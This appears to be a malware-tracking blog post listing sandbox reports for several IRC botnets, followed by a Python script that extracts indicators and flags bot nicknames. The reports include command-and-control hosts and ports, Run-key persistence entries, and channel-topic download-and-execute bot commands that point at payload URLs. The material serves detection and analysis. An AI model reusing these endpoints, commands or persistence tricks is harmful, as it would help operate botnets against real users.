Author: Pig

bean.F-QACS.INF(botnet hosted in United Kingdom Knowinservers Ltd)

IRC server: bean.F-QACS.INFO:5337 (178.162.175.63:5337)
Nick: [NEW][USA]72014
Username: [NEW][USA]72014
Joined Channel: #ed
Registry persistence (autorun):
HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  Windows Service Host = C:\Documents and Settings\Administrator\Application Data\svchost.exe
(Note: the Run key sits under the SID of the built-in Administrator account (RID 500), and the dropped file borrows the name svchost.exe; the real one lives in %SystemRoot%\System32, not under Application Data.)
Info about hosting: http://whois.domaintools.com/178.162.175.63

a.botsgod.info(VirUs aka lamer botnet hosted in France Gandi)

IRC server: a.botsgod.info port 4949, channel ##A##
Topic is ‘!j #1,#2’ Set by XxX on Wed Dec 22 07:14:52
Topic is ‘!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1’ Set by xXx on Wed Dec 22 20:03:17
Topic is ‘!NAZEL http://promofile.info/setup715.exe SDSDSD.exe 1’ Set by XxX on Wed Dec 22 07:18:12
(The channel topic carries the bot commands: a join command and two download-and-run commands giving the URL, the local file name and a flag.)
a.botsgod.info ip: 95.142.173.4
a.botsgod.info ip: 95.142.173.176
Info about hosting: http://whois.domaintools.com/95.142.173.4

serv01.colo.owned.hu(botnet hosted with Egypt Afrinic)

Remote Host / Port Number:
  196.46.191.100 31092
  212.97.132.151 80
  95.211.84.41 80
IRC login: NICK US|computername USER duiizaui UNIX UNIX :username
JOIN #all#
JOIN #US
Now talking in #all#
Topic On: [ #all# ] [ zg8w2CSUq2uia0QJlZCB54+bx1ORaIYwuWdNWqLiaRItRqdzrOHaoL/ZlA/RBgykhuYXvz0p+UCC5AowzlgNggVoLqkXzM+L2HR5WjCPVOsWHS21OdGLfnuALxORajUP/gdM/hRbMXB+mBM995oqart5JdolC5OI ]
(Unlike the a.botsgod.info topics, this command is a base64-looking blob rather than plaintext.)
Modes On: [ #all# ] [ +smntMu ]
Resolved : [serv01.colo.owned.hu] To [83.15.2.2]
Resolved : [serv01.colo.owned.hu] To [83.233.167.103]
Resolved : [serv01.colo.owned.hu] To
Read more...

adpool-3.net(malware hosted with hosting.ua)

DNS Lookup (Host Name, IP Address):
  www.microsoft.com 65.55.12.249
  dell-d3e62f7e26 10.1.7.2
  10.1.1.1 10.1.1.1
  wpad
  adpool-3.net adpool-3.net 178.86.0.144
UDP Connections:
Opened listening TCP connection on port: 1515
Opened listening TCP connection on port: 6135
Download URLs:
  http://178.86.0.144/cgi-bin/npr/web/t_riz.cgi?magic=151561350006&ox=2-5-1-2600&tm=60&id=-1&cache=0880350166 (adpool-3.net)
Outgoing connection to remote server: www.microsoft.com port 80
Outgoing connection to remote server: adpool-3.net TCP port 80
Registry Changes by
Read more...

rolando9.clanhosters.org(malware hosted with United States Dallas Theplanet.com Internet Services Inc)

DNS Lookup (Host Name, IP Address):
  dell-d3e62f7e26 10.1.14.2
  10.1.1.1 10.1.1.1
  wpad
  stuypel.free.bg stuypel.free.bg 188.40.80.188
  rolando9.clanhosters.org rolando9.clanhosters.org 174.121.1.58
  sharo.fileave.com sharo.fileave.com 64.62.181.43
Opened listening TCP connection on port: 12380
Download URLs:
  http://188.40.80.188/Thumbsx.db (stuypel.free.bg)
  http://64.62.181.43/0234254.exe (sharo.fileave.com)
Outgoing connection to remote server: stuypel.free.bg TCP port 80
Outgoing connection to remote server: rolando9.clanhosters.org TCP port 80
Outgoing connection to remote server:
Read more...

synyoshi.dyndns.info(botnet hosted with United States Walnut Psychz Networks)

DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp
IRC server: 173.224.219.21:6667
Nick: n[XP-AUT]176146
Username: 8977
Joined Channel: #ganja#
Registry Changes by all processes (Create or Open Changes):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "Windows Update System" = C:\Dokumente und
Read more...
(Note: the third key is the Windows Firewall's authorized-applications list, so the bot whitelists its own binary alongside the two Run-key autoruns. The paths are from a German-language XP sandbox; the legitimate taskeng.exe does not live under Anwendungsdaten.)

76f.no-ip.biz(malware hosted with

DNS Lookup (Host Name, IP Address):
  76f.no-ip.biz 173.0.3.196
  api.ipinfodb.com 67.212.74.82
Download URLs:
  http://67.212.74.82/v2/ip_query_country.php?key=86c9c734428c1230cba1356dcf99dc882bc229bf93fbd6491db4e8776d6d9a88&timezone=off (api.ipinfodb.com)
Outgoing connection to remote server: 76f.no-ip.biz port 3333
Outgoing connection to remote server: api.ipinfodb.com TCP port 80
Registry Changes by all processes (Create or Open Changes):
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\SrvID\ID "UMUZZPIO31" = Spread
HKEY_CURRENT_USER\Software\VB and VBA Program Settings\INSTALL\DATE "UMUZZPIO31" =
Read more...
(Note: "VB and VBA Program Settings" is where Visual Basic's SaveSetting writes, so the sample is a VB-built binary; the ipinfodb query is the bot geolocating its victim before reporting in on port 3333.)

saud.markaz-royal.net(botnet hosted with Germany Hetzner Online Ag)

DNS Queries (Name, Query Type, Query Result, Successful, Protocol):
  saud.markaz-royal.net DNS_TYPE_A 46.4.176.169 YES udp
IRC server: 46.4.176.169:7493
Nick: {N}|AUT|XP|pc5|971512
Username: betqyd
Server Pass: (null)
Joined Channel: #null#
Private Message to Channel #null#: "New Servant."
Info about hosting: http://whois.domaintools.com/46.4.176.169
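The excerpts above are flattened sandbox reports that all expose the same handful of indicators: an IRC server and port, a tagged bot nickname and channel, commands pushed through the channel topic, download URLs, Run-key autoruns and outbound connections. As an added example (not code from this blog or from any sandbox it quotes), the Python script below pulls those indicators out of text in that layout and flags the tagged-nick pattern the bots use. The sample input is constructed from lines copied from the posts above, with the backslashes the page lost restored and the Run-key value names quoted; the regexes assume that report layout and nothing more.

```python
"""Pull indicators out of flattened sandbox reports like the ones above.

Added example for this page, not code from the blog or from any sandbox it
quotes. The regexes assume the report layout seen in the posts ('Nick: ...
Joined Channel: ...', "Topic is '...'", 'Download URLs', 'Outgoing connection
to remote server: HOST [TCP] port N', Run-key lines).
"""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from the posts above, with the backslashes
# the blog's extraction dropped restored and Run-key value names quoted.
SAMPLE_REPORT = r"""
bean.F-QACS.INFO:5337 178.162.175.63:5337 Nick: [NEW][USA]72014 Username: [NEW][USA]72014 Joined Channel: #ed
HKU\S-1-5-21-842925246-1425521274-308236825-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN "Windows Service Host" = C:\Documents and Settings\Administrator\Application Data\svchost.exe
a.botsgod.info 4949 ##A## Topic is '!j #1,#2' Set by XxX on Wed Dec 22 07:14:52
Topic is '!NAZEL http://dvdmediaplus.in/install.48755.exe s9d8y5.exe 1' Set by xXx on Wed Dec 22 20:03:17
synyoshi.dyndns.info DNS_TYPE_A 173.224.219.21 YES udp 173.224.219.21:6667 Nick: n[XP-AUT]176146 Username: 8977 Joined Channel: #ganja#
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Update System" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\taskeng.exe
Download URLs http://188.40.80.188/Thumbsx.db (stuypel.free.bg) http://64.62.181.43/0234254.exe (sharo.fileave.com)
Outgoing connection to remote server: 76f.no-ip.biz port 3333
Outgoing connection to remote server: api.ipinfodb.com TCP port 80
46.4.176.169:7493 Nick: {N}|AUT|XP|pc5|971512 Username: betqyd Server Pass: (null) Joined Channel: #null#
"""

# IP:port followed by the sandbox's IRC login summary (Server Pass is optional).
IRC_RE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s+Nick:\s+(\S+)\s+Username:\s+\S+"
    r"(?:\s+Server Pass:\s+\S+)?\s+Joined Channel:\s+(\S+)")
# Channel topics that start with a bang are bot commands.
TOPIC_RE = re.compile(r"Topic is '(![^']*)'")
URL_RE = re.compile(r"https?://[^\s'\")]+")
# Any hive path ending in \Run, then "value name" = path (rest of the line).
RUN_KEY_RE = re.compile(r'(HK\S+\\Run)\s+"([^"]+)"\s*=\s*(.+?)\s*$',
                        re.IGNORECASE | re.MULTILINE)
OUTBOUND_RE = re.compile(
    r"Outgoing connection to remote server:\s+(\S+)\s+(?:TCP\s+)?port\s+(\d+)")


@dataclass
class Indicators:
    irc_sessions: list = field(default_factory=list)    # (ip, port, nick, channel)
    topic_commands: list = field(default_factory=list)  # (command, [args])
    urls: list = field(default_factory=list)
    run_keys: list = field(default_factory=list)        # (key, value_name, path)
    outbound: list = field(default_factory=list)        # (host, port)


def looks_like_bot_nick(nick: str) -> bool:
    """Heuristic for the tagged nicks in the posts: country/OS markers in
    brackets, braces or pipe-separated fields, ending in a random number
    (e.g. [NEW][USA]72014, {N}|AUT|XP|pc5|971512). Plain nicks score False."""
    has_tag = re.search(r"[\[\]{}|]", nick) is not None
    numeric_tail = re.search(r"\d{3,}$", nick) is not None
    return has_tag and numeric_tail


def extract_indicators(text: str) -> Indicators:
    ind = Indicators()
    for ip, port, nick, channel in IRC_RE.findall(text):
        ind.irc_sessions.append((ip, int(port), nick, channel))
    for topic in TOPIC_RE.findall(text):
        command, *args = topic.split()
        ind.topic_commands.append((command, args))
    ind.urls = sorted(set(URL_RE.findall(text)))
    ind.run_keys = list(RUN_KEY_RE.findall(text))
    ind.outbound = [(host, int(port)) for host, port in OUTBOUND_RE.findall(text)]
    return ind


def bot_sessions(ind: Indicators) -> list:
    """IRC sessions whose nick follows the bot tagging scheme."""
    return [s for s in ind.irc_sessions if looks_like_bot_nick(s[2])]


def payload_urls(ind: Indicators) -> list:
    """URLs that deliver executables, whether they came from a 'Download URLs'
    section or from a channel-topic command."""
    return [u for u in ind.urls if u.lower().endswith(".exe")]


if __name__ == "__main__":
    ind = extract_indicators(SAMPLE_REPORT)
    for ip, port, nick, channel in ind.irc_sessions:
        flag = "BOT" if looks_like_bot_nick(nick) else "   "
        print(f"{flag} irc {ip}:{port} {nick} -> {channel}")
    for command, args in ind.topic_commands:
        print("topic command", command, args)
    for url in payload_urls(ind):
        print("payload", url)
    for key, name, path in ind.run_keys:
        print("autorun", key, repr(name), path)
    for host, port in ind.outbound:
        print("outbound", host, port)
```

The nick heuristic deliberately wants both a tag separator and a numeric tail, so the raw `NICK US|computername` from the serv01.colo.owned.hu log would not be flagged; loosen it at your own false-positive cost. Payloads are judged by the `.exe` suffix only, which is why `Thumbsx.db` from the rolando9 post is reported as a URL but not as a payload.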